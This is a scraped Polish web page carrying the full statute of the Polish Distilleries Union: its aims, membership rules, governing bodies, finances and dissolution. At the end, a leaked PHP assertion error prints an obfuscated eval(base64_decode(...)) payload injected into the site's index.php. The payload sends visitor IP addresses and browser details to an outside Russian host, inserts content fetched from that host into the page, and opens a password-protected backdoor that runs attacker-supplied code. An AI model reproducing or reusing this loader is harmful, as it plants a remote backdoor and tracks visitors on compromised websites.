Get Adobe Flash player
Polecamy:

Informacja Firmy BETTER ENERGY

Nowoczesna Technologia
Produkcji Spirytusu


ZGP współpracuje z firmą
MARCON z Poznania w sprawie
dot. rejestracji  etanolu 
systemie REACH"

www.chemiakonsulting.pl/

Szukaj w serwisie
Szukaj ogłoszenia
Gościmy
Naszą witrynę przegląda teraz 42 gości 
Licznik odwiedzin
Dzisiaj159
Wczoraj330
Wszystkie odwiedziny984961
Galerie

Notice: Undefined variable: cssimg in /home/biznesplan/ftp/ZGP/modules/mod_jglatestcat/helper.php on line 192
Start Informacje o ZGP Statut ZGP

ZWIĄZEK GORZELNI POLSKICH
54-610 Wrocław,ul. Mińska 60, tel./fax 071/ 35-63-952tel.71/35-63-951,
email:
Adres poczty elektronicznej jest chroniony przed robotami spamującymi. W przeglądarce musi być włączona obsługa JavaScript, żeby go zobaczyć.

S T  A T U T
ZWIAZKU GORZELNI POLSKICH


ROZDZIAŁ I

POSTANOWIENIA OGÓLNE

§1

Związek Gorzelni Polskich zwany dalej Związkiem nabywa osobowość prawną z dniem zarejestrowania .

§2

Siedzibą Związku jest miasto Wrocław , ul. Mińska 60, a terenem działania obszar Rzeczpospolitej Polskiej.

§3

Związek działa na podstawie ustawy z dnia 23 maja 1991 r. o organizacjach pracodawców

( Dz. U. Nr 55 poz.235 ze zmianami ) oraz na podstawie niniejszego statutu.

§4

Związek jest samorządny i niezależny w swej działalności statutowej od organów administracji państwowej, samorządu terytorialnego , związków zawodowych oraz innych organizacji

§5

 1. Związek ma prawo do tworzenia federacji i konfederacji oraz przystępowania do już istniejących, a także do przystępowania do organizacji pracodawców o charakterze międzynarodowym.
 2. Związek ma prawo tworzyć terenowe jednostki organizacyjne, w przypadku utworzenia takich jednostek, strukturę organizacyjną i zasady tworzenia tych jednostek określa statut.

§6

Związek opiera swoją działalność na pracy społecznej członków. Do prowadzenia swych spraw może zatrudniać pracowników.

§7

Związek może używać odznak i pieczęci na zasadach określonych w przepisach szczegółowych.

ROZDZIAŁ I

CELE I SPOSOBY DZIAŁANIA

§1

 Celem Związku jest:

 1. Ochrona praw i reprezentowanie interesów zrzeszonych członków wobec związków zawodowych pracowników, organów władzy i administracji państwowej oraz organów samorządu terytorialnego, a także wobec Agencji Nieruchomości Rolnych Skarbu Państwa.
 2. Współpraca z instytucjami i organizacjami finansowymi , których zasadniczym celem działania jest obsługa rynku rolnego oraz innych podmiotów gospodarczych.
 3. Prowadzenie wszelkich działań zmierzających do unowocześnienia produkcji spirytusu surowego w Gorzelni, a także tworzenia możliwości poprawy warunków pracy zatrudnionych pracowników.
 4. Pomoc organizacyjna, specjalistyczna i prawna członkom Związku.
 5. Propagowanie zasad etyki zawodowej pracodawców, dobrych obyczajów gospodarczych, upowszechniania przykładów pozytywnych postaw.
 6. Integracja środowiska producentów spirytusu będących dzierżawcami i właścicielami Gorzelni.
 7. Współpraca z międzynarodowymi organizacjami pomocowymi oraz organizacjami zrzeszającymi producentów za granicą.
 8. Dążenie do:

8.1. poprawy i stabilizacji warunków polskiego Gorzelnictwa i jego otoczenia, 
8.2. stabilizacji polityki państwa i samorządów terytorialnych wobec gospodarki.

§2

Związek realizuje swoje cele poprzez:

 1. Podejmowanie działań i inicjatyw służących poprawie rentowności produkcji spirytusu surowego.
 2. Opiniowanie wszelkich aktów prawnych w tym aktów prawa miejscowego w zakresie objętym zadaniami Związku, przedstawionych przez odpowiednie władze oraz Krajową Federację Związków.
 3. Przygotowanie szkoleń, seminariów, odczytów, konferencji, których podstawowym celem będzie realizacja zadań statutowych.
 4. Prowadzenie mediacji w sprawach spornych pomiędzy członkami Związku oraz pomiędzy członkami Związku , a innymi podmiotami.
 5. Prowadzenie rokowań i sporów zbiorowych z właściwymi związkami zawodowymi zrzeszającymi osoby zatrudnione w podmiotach reprezentowane przez Związek.
 6. Organizowanie wszelkiej pomocy swoim członkom, w tym i pomocy prawnej na zasadach określonych w przepisach uchwalonych przez organy Związku.
 7. Pozyskiwanie i udostępnianie swoim członkom bieżących informacji produkcyjnych prawno-organizacyjnych istotnych dla ich działalności.

§3

Związek może prowadzić działalność gospodarczą, na ogólnych zasadach określonych w odrębnych przepisach. Dochód z działalności gospodarczej Związku służy realizacji celów Statutowych i nie może być przeznaczony do podziału między jego członków.

ROZDZIAŁ III

CZŁONKOWIE , ICH PRAWA I OBOWIĄZKI

§1

 1. Członkami Związku mogą być osoby fizyczne i prawne oraz jednostki organizacyjne, zatrudniające pracowników, których przedmiotem działania jest prowadzenie działalności w zakresie produkcji spirytusu oraz przetwórstwa rolno-spożywczego.
 2. Jednostka, nie spełniająca wymagań określonych w ust. 1 może być członkiem wspierającym Związku. Dotyczy to w szczególności wszelkich podmiotów zajmujących się przetwórstwem spirytusu surowego oraz produkcji środków lub ich dystrybucji.

§2

Członkowie Związku dzielą się na:

 1. Członków zwyczajnych
 2. Członków wspierających

§3

 1. Członkiem Zwyczajnym Związku może być jedynie podmiot spełniający warunki określone w §2 ust.1 i nie pozbawiony praw publicznych.
 2. Członkiem Wspierającym niezależnie od warunków określonych w §2 ust.2 może być jednostka zainteresowana działalnością Związku, która zadeklarowała na jego rzecz pomoc finansową lub rzeczową.
 3. Członków Zwyczajnych i Wspierających przyjmuje w drodze uchwały Zarząd, na podstawie pisemnej deklaracji, nie dotyczy to Członków założycieli Związku.

§4


Członek Zwyczajowy ma prawo do:

 1. czynnego i biernego prawa wyborczego do władz Związku,
 2. zgłaszania opinii i wniosków pod adresem władz Związku,
 3. zaskarżenia do Walnego Zebrania Członków uchwały Zarządu Związku o skreśleniu z listy członków,
 4. uzyskania pomocy organizacyjnej i prawnej na zasadach określonych w odrębnej uchwale Walnego Zebrania Członków,
 5. brania udziału we wszelkich formach szkolenia na zasadach określonych w odrębnej uchwale Walnego Zebrania Członków,
 6. reklamy i promocji w ramach Związku produktów przez siebie wytworzonych lub będących przedmiotem obrotu gospodarczego członka Związku.

Członek Zwyczajny zobowiązany jest do:

 1. przestrzegania statutu, regulaminów i uchwał Władz Związku,
 2. regularnego opłacania składek i  innych świadczeń na rzecz Związku,
 3. pomocy organom Związku w każdym przypadku gdy zostanie o to poproszony,
 4. wykonywania Uchwał Związku o ile nie naruszają jego praw.

§5

 1. Członek Wspierający , z wyjątkiem czynnego i biernego prawa wyborczego, posiada prawa określone w §4 ust.1pkt. 2,3 i 5,6.
 2. Członek Wspierający ma prawo brać udział (z głosem doradczym) w statutowych Władzach Związku. Jednakże o ile organ Związku uzna to za konieczne , może zarządzić przeprowadzenie poszczególnych czynności bez obecności Członków Wspierających
 3. Członek Wspierający posiada obowiązki określone §4 ust.2 pkt.1 i 2

§6

1.Członkowstwo w Związku ustaje na skutek:

1)     dobrowolnej rezygnacji z przynależności do Związku, zgłoszonej  na piśmie Zarządowi, po uprzednim uregulowaniu zobowiązań odnośnie Związku,
2)     śmierci członka, utraty zdolności do czynności prawnych lub utraty osobowości prawnej przez członka wspierającego,
3)     wykluczenie ze Związku z powodu nieusprawiedliwionego zalegania w opłacaniu składek członkowskich lub innych zobowiązań, przez okres przekraczający 6 miesięcy.

2.W przypadku określonym w ust.1 pkt.2 i 3 orzeka Zarząd podając przyczyny skreślenia lub wykluczenia.
3.Osoba wykluczona lub skreślona ma prawo wniesienia odwołania do Walnego Zebrania Członków w terminie 14 dni od daty doręczenia stosownej uchwały
4. Do osób, którym odmówiono prawa członkostwa stosuje się odpowiednio zasady określone w ust.3.

ROZDZIAŁ  IV
ORGANY ZWIĄZKU 

§1

Władzami Związku są:

1. Walne Zebranie Członków
2. Komisja Rewizyjna
3. Zarząd

§2

 1. Kadencja Zarządu i Komisji Rewizyjnej Związku trwa cztery lata, a ich wybór odbywa się w głosowaniu tajnym, bezwzględną większością głosów przy obecności połowy członków Walnego Zebrania Członków, zaś w przypadku obrad odbywających się w drugim terminie faktycznie obecnych członków Walnego Zebrania Członków.
 2. Uchwały Zarządu Związku, podejmowane są w głosowaniu jawnym, zwykłą większością głosów, przy obecności co najmniej połowy ogólnej liczby uprawnionych członków (kworum), chyba, że statut stanowi  inaczej.
 3. Uchwały Komisji Rewizyjnej, podejmowane są w głosowaniu jawnym, bezwzględną większością głosów, przy obecności co najmniej połowy ogólnej liczby uprawnionych członków ( kworum ),chyba, że statut stanowi inaczej. Na podstawie uchwały pełnego składu Komisja Rewizyjna może podejmować uchwały w głosowaniu tajnym.

§3

W przypadku ustąpienia, wykluczenia lub śmierci członka Władz Związku w trakcie kadencji, skład osobowy Władz jest uzupełniany poprzez przeprowadzenie wyborów na nie obsadzone stanowisko.

WALNE ZEBRANIE CZŁONKÓW

§4

 1. Walne Zebranie jest najwyższą władzą Związku
 2. W Walnym Zebraniu Członków biorą udział:

1) z głosem stanowiącym-członkowie zwyczajni,
2) z głosem doradczym- członkowie wspierający.

§5

 1. Walne Zebranie Członków może być zwyczajne lub nadzwyczajne.
 2. Sprawozdawcze Walne Zebranie Członków zwołuje się raz w roku, w terminie do czterech miesięcy po upływie roku kalendarzowego.
 3. Sprawozdawczo-wyborcze Walne Zebranie Członków zwołuje się raz na cztery lata.
 4. Walne Zebranie Członków obraduje wg uchwalonego przez siebie regulaminu obrad.
 5. Obradami Walnego Zebrania kieruje Prezydium w składzie: przewodniczący, zastępca , sekretarz.
 6. Prezydium Walnego Zebrania wybierane jest w głosowaniu jawnym, bezwzględną większością obecnych członków spośród członków Związku, nie wchodzących w skład Zarządu i Komisji Rewizyjnej.
 7. Członek ustępujących władz nie może wejść w skład Prezydium Walnego Zebrania Członków.
 8. Nadzwyczajne Walne Zgromadzenie Członków zwołuje w szczególnie uzasadnionych przypadkach:

1) Zarząd
2) Komisja Rewizyjna,
3) Jedna trzecia Członków Związku.

 1. O miejscu, terminie i porządku obrad Walnego Zebrania Członków Zarząd powiadamia   Członków co najmniej na 7 dni przed terminem zebrania.
 2. Uchwały Walnego Zebrania Członków zapadają w głosowaniu jawnym zwykłą większością głosów przy obecności co najmniej połowy ogólnej liczby członków.

§6

Do kompetencji Walnego Zebrania Członków w szczególności należy:

 1. uchwalenie statutu i jego zmian,
 2. uchwalenie regulaminu Władz Związku,
 3. wybór i odwoływanie członków Władz Związku, w tym wybór Prezesa Związku,
 4. rozpatrywanie i zatwierdzanie sprawozdań Władz Związku,
 5. ustalenie wysokości składek członkowskich,
 6. podejmowanie decyzji o nabyciu lub zbycie majątku nieruchomego i ruchomego powyżej 50 tys. zł
 7. ustalenie zasad udziału członków Związku w szkoleniach i innych formach kształcenia,
 8. podejmowanie uchwały o rozwiązaniu Związku i przeznaczeniu jego majątku,
 9. powołanie komisji likwidacyjnej.

KOMISJA REWIZYJNA

§7

 1. Komisja Rewizyjna jest organem Związku powołanym do sprawowania kontroli nad jego działalnością.
 2. Komisja Rewizyjna składa się z trzech członków w tym przewodniczącego wybranego przez skład Komisji.
 3. Do zakresu działania komisji Rewizyjnej należy:
  1)      kontrolowanie działalności Związku,
  2)      występowanie do Zarządu z wnioskami wynikającymi z przeprowadzonych kontroli,
  3)      prawo zwołania Nadzwyczajnego Walnego Zebrania Członków, w razie stwierdzenia nie wywiązywania się przez Zarząd z jego statutowych obowiązków, a także prawo żądania zwołania posiedzenia Zarządu
  4)      zwołanie Walnego Zebrania Członków, w razie nie zwołania go przez Zarząd w terminie ustalonym statutem,
  5)      składanie na  Walnym Zebraniu Członków wniosków o udzielenie ( lub odmowę udzielenia ) absolutorium Władzą Związku,
  6)      składanie sprawozdań ze swojej działalności na Walnym Zebraniu Członków.
 4. Członkowie komisji Rewizyjnej nie mogą pełnić innych funkcji we Władzach Związku.
 5. Komisja Rewizyjna działa na podstawie uchwalonego przez siebie regulaminu.
 6. W przypadkach określonych w §8 pkt. 3 i 4 Walne Zebranie Członków winno być zwołane w terminie nie dłuższym niż 30 dni od daty zgłoszenia żądania, a posiedzenie Zarządu nie później niż w terminie 14 dni od daty zgłoszenia żądania.

ZARZĄD

 §8

 1. Zarząd kieruje całokształtem działalności Związku, zgodnie z uchwałami Walnego Zebrania Członków, reprezentuje je na zewnątrz i ponosi odpowiedzialność przed Walnym Zebraniu Członków.
 2. Zarząd składa się z 9 członków.
 3. W przypadku przekroczenia liczby 50 członków, do 100 członków, Zarząd może liczyć do 15 osób. W  takim przypadku Zarząd powołuje 5 osobowe Prezydium.
 4. W skład Prezydium wchodzą:

a) prezes,
b) dwóch wiceprezesów,
c)  sekretarz,
d) skarbnik.

 1. Prezydium obraduje w przerwach pomiędzy posiedzeniami Zarządu.
 2. Prezydium zbiera się na posiedzenie, przynajmniej jeden raz w miesiącu.
 3. W przypadku, kiedy liczba Członków Związku przekroczy liczbę 100, Zarząd Związku może liczyć 19 członków.
 4. Prezydium liczyć wówczas będzie do 7 członków, w składzie jak w pkt.4
 5. Osobami uprawnionymi do składania oświadczeń woli na zewnątrz są dwaj członkowie Zarządu w tym Prezes i Wiceprezes. Osoby te uprawnione są do zaciągania zobowiązań majątkowych w imieniu Związku.

10.  Zasady działania Zarządu ustala regulamin uchwalony przez Zarząd.
11.  Posiedzenia Zarządu odbywają się nie rzadziej niż cztery razy w roku.
12.  Prezes Zarządu organizuje prace Zarządu, kieruje jego pracami oraz reprezentuje Związek na zewnątrz. Prezes może upoważnić innych członków Zarządu do występowania w jego imieniu.
13.   Do zakresu działania Zarządu należy :|
1)      realizacja uchwał Walnego Zebrania Członków,
2)      ustalenie budżetu Związku,
3)      sprawowanie zarządu nad majątkiem Związku,
4)      podejmowanie decyzji w sprawie zaciągania zobowiązań do kwoty 50 tys.zł.,
5)      zwołanie Walnego Zebrania Członków,
6)      podejmowanie uchwał w sprawach przyjmowania, skreślania i wykluczania członków,
7)      składanie sprawozdań ze swojej działalności na Walnym Zebraniu Członków,
8)      uchwalanie regulaminów przewidzianych w statucie,
9)      przygotowanie uchwał Walnego Zebrania Członków,
10)    podejmowanie decyzji o przystąpienie Związku do innych organizacji i podmiotów,
11)      decyduje także we wszystkich ważnych sprawach dotyczących Związku i jego działalności nie  zastrzeżonych do decyzji Walnego Zebrania Członków.

ROZDZIAŁ  V
MAJĄTEK I FUNDUSZE

§1

Majątek Związku stanowią nieruchomości, ruchomości i fundusze.

§2

Źródłami powstania majątku Związku są:

 1. składki członkowskie,
 2. darowizny, zapisy i spadki,
  1. wpływy z działalności statutowej Związku ( dochodów z własnej działalności, dochody    z działalności Związku )

§3

Składki członkowskie powinny być wypłacane do końca I kwartału każdego roku. Nowo przyjęci członkowie wpłacają składki, wg zasad określonych przez Zarząd, w ciągu ośmiu tygodni od otrzymania powiadomienia o przyjęciu na członka Związku.

§4

Związek prowadzi gospodarkę finansową oraz rachunkowość, zgodnie z obowiązującymi przepisami.

§5

 1. Dla ważności oświadczenia woli, jak również wszelkich pismo przedmiocie praw i  obowiązków majątkowych Związku wymagane są podpisy dwóch członków Zarządu w tym Prezesa lub Wiceprezesa i jednego z pozostałych członków Zarządu.
 2. Dla ważności innych pism i dokumentów wymagany jest podpis Prezesa lub upoważnionej przez niego osoby.

ROZDZIAŁ VI

ZMIANA STATUTU I ROZWIĄZANIE ZWIĄZKU

§1

Uchwalenie statutu lub jego zmiana oraz podjęcie uchwały o rozwiązaniu Związku przez Walne Zebranie Członków wymaga kwalifikowanej większości 2/3 głosów, przy obecności co najmniej połowy członków uprawnionych do głosowania.

§2

Podejmując uchwałę o rozwiązaniu Związku Walne Zebranie Członków określa sposób przeprowadzenia likwidacji oraz przeznaczenia majątku Związku.

§3

W sprawach dotyczących rozwiązania i likwidacji Związku, nie uregulowanych w statucie, mają odpowiednie zastosowanie przepisy ustawy z dnia 23 maja 2001r. O organizacjach pracodawców (Dz. U.1991r. Nr 55 poz.235 z późniejszymi zmianami ).

 

Assertion failed!


Script: /home/biznesplan/ftp/ZGP/index.php
Line: 103
Condition:
eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGVycm9yX3JlcG9ydGluZyhFX0FMTCk7QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIix0cnVlKTtAZXJyb3JfcmVwb3J0aW5nKDApOwppZighZW1wdHkoJF9DT09LSUVbImNsaWVudF9jaGVjayJdKSAmJiBlbXB0eSgkaWJ2KSkgeyAkaWJ2ID0gJF9DT09LSUVbImNsaWVudF9jaGVjayJdOyAgZWNobyAkaWJ2O30gZWxzZWlmIChlbXB0eSgkaWJ2KSkgewppZiAoc3Ryc3RyKCRfU0VSVkVSWyJIVFRQX0hPU1QiXSwgIjEyNy4wIikpeyRuYW1lID0gJF9TRVJWRVJbIlNFUlZFUl9BRERSIl07fWVsc2V7JG5hbWUgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07fQokdXNlcmEgPSBpc3NldCgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pP3VybGVuY29kZSgkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0pOiIiOwokdXJsID0gImh0dHA6Ly9hdmVuczcyLnJ1L2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjMwMGQwYjhiOTUzNTA4ZTdhMDQ2Y2UzZjQxODJiM2ZkMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gImU4ZjJkMDdmODVhYWY1ZjY0OGQ2MzQyYTRjYTkxYWUxIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));
variable value
$0"
key value
$function"debug_assert_callback"
[args]Nested Array
$1"
key value
$file"/home/biznesplan/ftp/ZGP/index.php"
$line"103"
$function"assert"
[args]Nested Array